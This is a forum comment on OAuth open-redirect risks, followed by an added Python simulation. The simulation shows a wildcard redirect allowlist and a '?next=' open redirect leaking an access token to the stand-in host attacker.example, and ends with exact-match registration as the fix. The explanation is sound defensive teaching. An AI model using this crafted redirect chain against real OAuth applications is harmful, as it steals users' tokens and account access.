by jlafon 4424 days ago
I'm trying to understand this too. This is only a problem if the OAuth provider (Google, Twitter, etc) does not validate the URL that the client is trying to redirect the user to after the user has authorized the app, correct?

Typically you pre-register a whitelist of redirect URLs with your OAuth provider. For example, you might whitelist example.com/app/* because you control the app and assume that you won't do anything evil. If /app/ includes an open redirect (generally considered to be Severity: Nominal), your application can be made to attack every user who grants it permissions, to the limit of the permissions they entrust your application with.
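The chain the comment above describes, as an added example that is not code from the thread or from any OAuth provider: a provider that registers `https://example.com/app/*` as a wildcard, a provider that registers one exact callback URI, and a "nominal" open redirect in a hypothetical `/app/login?next=` handler. The hosts, paths, parameter names and the token value are all constructed for the illustration; the fragment-preserving redirect behaviour is the one user agents follow (RFC 7231 §7.1.2), which is what carries an implicit-grant token from the registered app to the attacker's host.

```python
# Added example (not from the thread): wildcard redirect_uri allowlist + open redirect
# in the registered app = token leakage. Hosts, paths, ?next= and the token are assumptions.
from fnmatch import fnmatchcase
from typing import Callable, Optional
from urllib.parse import urlsplit, urlunsplit, parse_qs

# --- Provider side: two ways of validating the redirect_uri in the /authorize request ---

REGISTERED_PATTERN = "https://example.com/app/*"          # wildcard registration (the risky one)
REGISTERED_EXACT = {"https://example.com/app/callback"}    # complete URI, as RFC 6749 §3.1.2.2 recommends

def wildcard_allows(redirect_uri: str) -> bool:
    """Prefix/wildcard match: anything under /app/ is accepted, query string included."""
    return fnmatchcase(redirect_uri, REGISTERED_PATTERN)

def exact_allows(redirect_uri: str) -> bool:
    """Exact string comparison against the registered set: no wildcard, no extra query."""
    return redirect_uri in REGISTERED_EXACT

def provider_authorize(redirect_uri: str, allow: Callable[[str], bool], token: str) -> Optional[str]:
    """Implicit-grant style: after consent the provider 302s to redirect_uri with the token in the fragment."""
    if not allow(redirect_uri):
        return None                     # provider refuses the redirect_uri; the attack stops here
    return redirect_uri + "#access_token=" + token

# --- Client app side: the "Severity: Nominal" open redirect in /app/login?next=... ---

def app_open_redirect(url: str) -> Optional[str]:
    """Simulates a vulnerable /app/login handler: sends the browser wherever ?next= points, unvalidated."""
    parts = urlsplit(url)
    if parts.path != "/app/login":
        return None
    nxt = parse_qs(parts.query).get("next")
    return nxt[0] if nxt else None

def browser_follow(current_url: str, location: str) -> str:
    """Browsers keep the current fragment when the Location header carries none (RFC 7231 §7.1.2)."""
    cur, loc = urlsplit(current_url), urlsplit(location)
    if loc.fragment or not cur.fragment:
        return location
    return urlunsplit(loc._replace(fragment=cur.fragment))

def run_attack(allow: Callable[[str], bool], token: str = "tok_constructed_123") -> Optional[str]:
    """Returns the URL the victim's browser ends on after granting the app permission, or None if refused."""
    # Attacker-crafted redirect_uri: inside the registered prefix, but pointing the open redirect at the attacker.
    evil_redirect = "https://example.com/app/login?next=https://attacker.example/collect"
    landing = provider_authorize(evil_redirect, allow, token)
    if landing is None:
        return None
    hop = app_open_redirect(landing)
    if hop is None:
        return landing
    return browser_follow(landing, hop)

def token_leaked(final_url: Optional[str], token: str = "tok_constructed_123") -> bool:
    """True if the token ended up in a request to the attacker's host."""
    if final_url is None:
        return False
    parts = urlsplit(final_url)
    return parts.hostname == "attacker.example" and token in parts.fragment

if __name__ == "__main__":
    print("wildcard allowlist:", run_attack(wildcard_allows))
    print("exact allowlist:   ", run_attack(exact_allows))
```

With the wildcard allowlist the browser ends up on `https://attacker.example/collect#access_token=...`; with an exact-match allowlist the provider never issues the redirect, so the same open redirect in `/app/` cannot be reached with a token attached. The code-flow variant leaks `?code=` the same way whenever the open redirect forwards the query string, which is why the fix belongs on both sides: exact `redirect_uri` registration at the provider and no unvalidated redirects anywhere under the registered path.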